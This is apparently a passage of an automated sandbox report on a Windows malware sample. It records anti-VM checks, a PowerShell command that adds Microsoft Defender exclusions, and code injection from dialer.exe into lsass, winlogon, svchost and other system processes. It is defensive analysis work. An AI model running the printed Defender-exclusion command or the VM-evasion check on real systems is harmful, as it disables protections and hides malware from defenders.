                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                      Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_17-413
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\winlogon.exe | Code function: 22_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001E858987D90
Source: C:\Windows\System32\dialer.exe | Code function: 47_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,47_2_00000001408460F0
Source: C:\Windows\System32\dialer.exe | Code function: 17_2_00000001400017EC GetProcessHeap,RtlAllocateHeap,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,17_2_00000001400017EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\system64x.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe | Process token adjusted: Debug
Source: C:\ProgramData\Google\Chrome\updater.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\system64x.exe | Code function: 3_2_00007FF762441160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,3_2_00007FF762441160
Source: C:\Windows\System32\winlogon.exe | Code function: 22_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001E85898D2A4
Source: C:\ProgramData\Google\Chrome\updater.exe | Code function: 28_2_00007FF72AF21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,28_2_00007FF72AF21160
Source: C:\Windows\System32\lsass.exe | Code function: 31_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000140AE867D90
Source: C:\Windows\System32\lsass.exe | Code function: 31_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000140AE86D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00000195DD5CD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00000195DD5C7D90
Source: C:\Windows\System32\dwm.exe | Code function: 33_2_000001160CA9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_000001160CA9D2A4
Source: C:\Windows\System32\dwm.exe | Code function: 33_2_000001160CA97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_000001160CA97D90
Source: C:\Windows\System32\dialer.exe | Code function: 45_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,45_2_0000000140001160
Source: C:\Windows\System32\svchost.exe | Code function: 48_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00000257E10AD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 48_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00000257E10A7D90
Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001F28C937D90
Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001F28C93D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_000001CA9854D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 50_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_000001CA98547D90
Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001D265317D90
Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001D26531D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000254A27DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000254A27DD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000254A27D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000254A27D7D90
Source: C:\Windows\System32\wbem\WMIADAP.exe | Code function: 53_2_0000028708E6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_0000028708E6D2A4
Source: C:\Windows\System32\wbem\WMIADAP.exe | Code function: 53_2_0000028708E67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_0000028708E67D90
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_0000024B87DDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000024B87DDD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 54_2_0000024B87DD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000024B87DD7D90
Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000205FD40D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00000205FD40D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000205FD407D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00000205FD407D90
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001A2056AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001A2056AD2A4
Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001A2056A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001A2056A7D90
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_0000018EC1F67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_0000018EC1F67D90
Source: C:\Windows\System32\svchost.exe | Code function: 57_2_0000018EC1F6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_0000018EC1F6D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000025CE3E0D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000025CE3E0D2A4
Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000025CE3E07D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000025CE3E07D90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_612.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe PID: 612, type: MEMORYSTR
Source: C:\Windows\SysWOW64\system64x.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 1160CA30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 1160CA60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: EC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1428DCF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DBFA540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23FB7310000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\explorer.exe base: 87A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28AF9060000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26106120000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 19D48690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1A4AA0F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2BEEB870000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1AEF8F80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 25B826F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 12107F90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1B210E80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 28708E30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Code function: 17_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,17_2_0000000140001C88
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 5895273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\lsass.exe EIP: ADFC273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DD59273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 589B273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AE89273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DE1A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CA6273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E107273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 652E273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A27A273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87DA273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FB3C273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 567273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C1F3273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E3BC273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 3895273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6E56273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1FF7273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F35273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7957273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A46273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1311273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8C58273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5F1D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D9C273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AEC9273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC1B273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8253273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: EC273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 66EB273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FD9A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CEDB273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4279273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B6F3273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8DCF273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7373273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FA54273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6CCC273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 39D9273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FA39273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B731273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53B5273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E88A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 77B5273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D34273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B5E1273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5999273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53C2273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 41D4273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: ADAD273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 307273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4DB273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 87A273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C528273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 76AA273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F1B3273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F34B273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DE4D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7447273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A9D0273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AF8E273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: D893273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5E93273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 43DC273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 97E3273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC87273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 698D273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F906273C
Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 34C5273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4354273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8434273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5892273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 612273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4869273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA0F273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EB87273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F8F8273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 826F273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7F9273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10E8273C
Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 8E3273C
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
